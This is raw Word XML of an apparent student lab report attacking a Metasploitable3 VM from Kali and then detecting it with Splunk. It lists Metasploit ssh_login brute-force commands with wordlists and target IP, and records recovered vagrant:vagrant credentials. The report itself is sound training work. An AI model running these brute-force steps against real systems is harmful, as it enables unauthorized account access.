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3496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>PHASE-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0129205C" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CB0FF0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>I will start doing the project with screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F2B9B" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="5AA887E0" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Metasploitable3 IP using ifconfig:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5FC02D" w14:textId="1400527D" w:rsidR="006F60CA" w:rsidRDefault="006F60CA" w:rsidP="00E249E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B693D14" wp14:editId="2F00F112">
            <wp:extent cx="5731510" cy="3837305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11642895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950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303D" w14:textId="77777777" w:rsidR="006F60CA" w:rsidRDefault="006F60CA" w:rsidP="00E249E2"/>
    <w:p w14:paraId="74C9F295" w14:textId="038F20D2" w:rsidR="006F60CA" w:rsidRPr="00E249E2" w:rsidRDefault="006F60CA" w:rsidP="00E249E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24EAB7B0" wp14:editId="36B27305">
            <wp:extent cx="5731510" cy="4877435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1978256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62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5C54" w14:textId="77777777" w:rsidR="006F60CA" w:rsidRPr="006F60CA" w:rsidRDefault="006F60CA" w:rsidP="006F60CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F60CA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="006F60CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003AB8B1" w14:textId="77777777" w:rsidR="006F60CA" w:rsidRPr="006F60CA" w:rsidRDefault="006F60CA" w:rsidP="006F60CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F60CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable3 (Victim)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F60CA">
        <w:t xml:space="preserve"> IP: 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CC1E4A" w14:textId="77777777" w:rsidR="006F60CA" w:rsidRPr="006F60CA" w:rsidRDefault="006F60CA" w:rsidP="006F60CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F60CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali Linux (Attacker)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F60CA">
        <w:t xml:space="preserve"> IP: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB2DB5F" w14:textId="77777777" w:rsidR="006F60CA" w:rsidRPr="006F60CA" w:rsidRDefault="006F60CA" w:rsidP="006F60CA">
      <w:r w:rsidRPr="006F60CA">
        <w:t>They are on the same subnet: 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F303812" w14:textId="7C17466B" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="07E3F0D2" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="4E9A5971" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Checking the devices in the network as we can see Metasploitable3 is up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126623E3" w14:textId="1F5DCF7C" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="006F60CA" w:rsidP="00E249E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A727642" wp14:editId="4E72A62C">
            <wp:extent cx="5731510" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2757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1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7B27" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Checking the reachability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63307024" w14:textId="10DE4B85" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="006F60CA" w:rsidP="00E249E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B03EEBB" wp14:editId="56715B0E">
            <wp:extent cx="5731510" cy="2005965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="184356880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880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508" w14:textId="794076DF" w:rsidR="009360AF" w:rsidRDefault="00E249E2" w:rsidP="009360AF">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Nmap the Metasploitable3 to check open ports and OS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CDA673" w14:textId="77777777" w:rsidR="009360AF" w:rsidRDefault="009360AF" w:rsidP="009360AF"/>
    <w:p w14:paraId="04F28AAC" w14:textId="77777777" w:rsidR="009360AF" w:rsidRDefault="009360AF" w:rsidP="009360AF">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="578AB593" w14:textId="2430F34D" w:rsidR="009360AF" w:rsidRPr="00E249E2" w:rsidRDefault="009360AF" w:rsidP="009360AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D7E330" wp14:editId="4DC2D6A0">
            <wp:extent cx="3017520" cy="2359682"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13744604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0444" name="Picture 137446044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69" r="25549"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3017520" cy="235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C637E" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="21519013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lastRenderedPageBreak/>
        <w:t>Task 1.1: Use Kali Linux tool Metasploit to compromise the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110DE53" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2E038D" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Okay I will select port 22 SSH using brute force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734AF330" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6076C5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>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B920A3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 xml:space="preserve"> use auxiliary/scanner/ssh/ssh_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1125C21E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>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7094B583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>set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140460C6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>set user_file /usr/share/wordlists/metasploit/unix_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07013AEA" w14:textId="548E6040" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E2">
        <w:t>set rhosts 192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidR="009360AF">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DD236" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E2">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB64C17" w14:textId="298DA557" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00597530" w:rsidP="00E249E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A0CC8E8" wp14:editId="65AD95F0">
            <wp:extent cx="5731510" cy="1266825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="20272921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215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C77" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve">I found that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E249E2">
        <w:t>vagrant:vagrant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve"> is username and passwords for ssh Metasploitable3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B588F6" w14:textId="6330CE1A" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="5F541DEE" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Successful manual SSH session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390D2820" w14:textId="55173CD4" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00597530" w:rsidP="00E249E2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7785854D" wp14:editId="4CDAB533">
            <wp:extent cx="5731510" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="197995555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5552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2658" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve">Task 1.1 Done </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:sym w:font="Wingdings" w:char="F0FE"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0EC30" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="5501CEB2" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="416353A9" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="1A8D61CC" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="3CED9C10" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="0288DA33" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="345B565C" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="2F0CD9D8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>Task 1.2: Compromise the service using a custom script that you create (an automated script that compromises the target and shows a Proof of Concept).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E05D1" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001351E9" w14:textId="77EB9207" w:rsidR="00597530" w:rsidRDefault="00E249E2" w:rsidP="0094223F">
      <w:r w:rsidRPr="00E249E2">
        <w:t>custom script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE42880" w14:textId="5D9422FD" w:rsidR="00E249E2" w:rsidRDefault="0094223F" w:rsidP="0094223F">
      <w:r w:rsidRPr="0094223F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="353EE5F0" wp14:editId="485770EE">
            <wp:extent cx="5731510" cy="5018405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20776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9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E997" w14:textId="77777777" w:rsidR="0094223F" w:rsidRPr="00E249E2" w:rsidRDefault="0094223F" w:rsidP="0094223F"/>
    <w:p w14:paraId="04F27585" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve">Running the python script and get shell: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64932513" w14:textId="021F2932" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="0094223F" w:rsidP="00E249E2">
      <w:r w:rsidRPr="0094223F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="007C0EA0" wp14:editId="54E73C56">
            <wp:extent cx="4248743" cy="1343212"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="9087469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696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4378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 xml:space="preserve">Task 1.2 Done </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0FE"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE35AF6" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16257FB0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 xml:space="preserve">PHASE-1 Done </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0FE"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A04134" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F23F8F" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D185A" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431C38DE" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>First install Splunk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE8660" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="2435CFAB" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve">wget -O splunk-9.3.2.deb </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00E249E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://download.splunk.com/products/splunk/releases/9.3.2/linux/splunk-9.3.2-d8bb32809498-linux-2.6-amd64.deb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C8ED7" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B09F07" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>server packets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1AFFB" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:br/>
        <w:t xml:space="preserve">             sudo dpkg -i splunk-9.3.2.deb </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6358DAE4" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>starting Splunk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D24B32" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="389BAC5C" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>sudo /opt/splunk/bin/splunk start --accept-license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47300E2D" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="199CBC80" w14:textId="697551FF" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="002B3CDE" w:rsidP="00E249E2">
      <w:r w:rsidRPr="002B3CDE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54D7A08B" wp14:editId="786F01A5">
            <wp:extent cx="5731510" cy="3216275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="157567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260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4069" w14:textId="1CCCFEDB" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="002B3CDE" w:rsidP="00E249E2">
      <w:r w:rsidRPr="002B3CDE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F59DC44" wp14:editId="4CE0CFA6">
            <wp:extent cx="5731510" cy="3736975"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1002890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08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C1AD" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2"/>
    <w:p w14:paraId="05D1F945" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Then create two indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354835D" w14:textId="29C1937A" w:rsidR="00E249E2" w:rsidRDefault="002B3CDE" w:rsidP="00E249E2">
      <w:r w:rsidRPr="002B3CDE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024377B5" wp14:editId="791E8D15">
            <wp:extent cx="5731510" cy="2588895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="16661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0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6293" w14:textId="51814A15" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="002B3CDE" w:rsidP="00E249E2">
      <w:r w:rsidRPr="002B3CDE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6803F1CD" wp14:editId="11B57EEB">
            <wp:extent cx="5731510" cy="2605405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="203461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16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E2" w:rsidRPr="00E249E2">
        <w:t>Set forwarder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D126870" w14:textId="3CDC9487" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="246247C5" wp14:editId="60AE7230">
            <wp:extent cx="5731510" cy="1873885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212062313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23132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4BA9" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Verify that logs from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Forwarder</w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:t> are being sent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C43FF" w14:textId="7050FE18" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6968248F" wp14:editId="1F5F8563">
            <wp:extent cx="5731510" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1725280784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0784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70EB" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E2">
        <w:t xml:space="preserve">Integrate logs from the victim environment into the SIEM platform. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0FE"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="130DB4B3" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD9FBE4" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A10A88" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151DDFCC" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361F472A" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F9D69E" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logs after attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D458E" w14:textId="3E71B393" w:rsidR="00CD0C98" w:rsidRPr="00E249E2" w:rsidRDefault="00CD0C98" w:rsidP="00E249E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53AB6CB9" w14:textId="5FD649D1" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B4F738A" wp14:editId="3CA9F985">
            <wp:extent cx="5731510" cy="3641725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98632737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E2AD" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>Show the Failed password logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2EF26" w14:textId="384F80BE" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12105D10" wp14:editId="0B307865">
            <wp:extent cx="5731510" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="83128834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58A5" w14:textId="77777777" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
        <w:t>index=* "Failed password" | timechart count:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3EBBF5" w14:textId="5B33A422" w:rsidR="00E249E2" w:rsidRPr="00E249E2" w:rsidRDefault="00E249E2" w:rsidP="00E249E2">
      <w:r w:rsidRPr="00E249E2">
